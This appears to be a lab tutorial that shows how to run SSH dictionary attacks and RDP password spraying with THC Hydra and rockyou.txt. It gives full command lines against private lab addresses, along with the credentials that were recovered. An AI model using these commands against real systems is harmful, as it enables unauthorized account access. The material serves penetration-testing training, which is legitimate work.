SSH & RDP Dictionary Attacks with Hydra

Published on June 24, 2025

In this section, we’ll execute dictionary attacks against SSH and RDP services using THC Hydra and the rockyou.txt wordlist.

1. Confirm SSH Service

sudo nmap -sV -p 2222 192.168.50.201

Explanation: -sV detects service versions; -p 2222 scans only port 2222;

2. Prepare the Wordlist

cd /usr/share/wordlists/

Explanation: Change to the directory containing common wordlists.

ls

Explanation: List files to confirm rockyou.txt.gz is present.

sudo gzip -d rockyou.txt.gz

Explanation: Decompresses rockyou.txt.gz into rockyou.txt.

3. SSH Dictionary Attack

hydra -l george \
  -P /usr/share/wordlists/rockyou.txt \
  -s 2222 \
  ssh://192.168.50.201

Explanation: -l george sets the username; -P points to the password file; -s specifies the service port; target in ssh://IP format.

Hydra reports a valid credential: george:chocolate.

4. Password Spraying RDP

a) Add missing usernames:

echo -e "daniel\njustin" | \
  sudo tee -a /usr/share/wordlists/dirb/others/names.txt

Explanation: echo -e outputs two lines; pipe into tee -a to append them to the list.

b) Run Hydra:

hydra -L /usr/share/wordlists/dirb/others/names.txt \
  -p "SuperS3cure1337#" \
  rdp://192.168.50.202

Explanation: -L gives the username list; -p sets a single password; target in rdp://IP format.

Hydra finds valid logins for daniel and justin.

5. Considerations & Cautions

Dictionary attacks generate noise (logs, alerts) and may lock accounts after repeated failures. Always enumerate services first, adjust task rates, and avoid disrupting production systems.

Linked Articles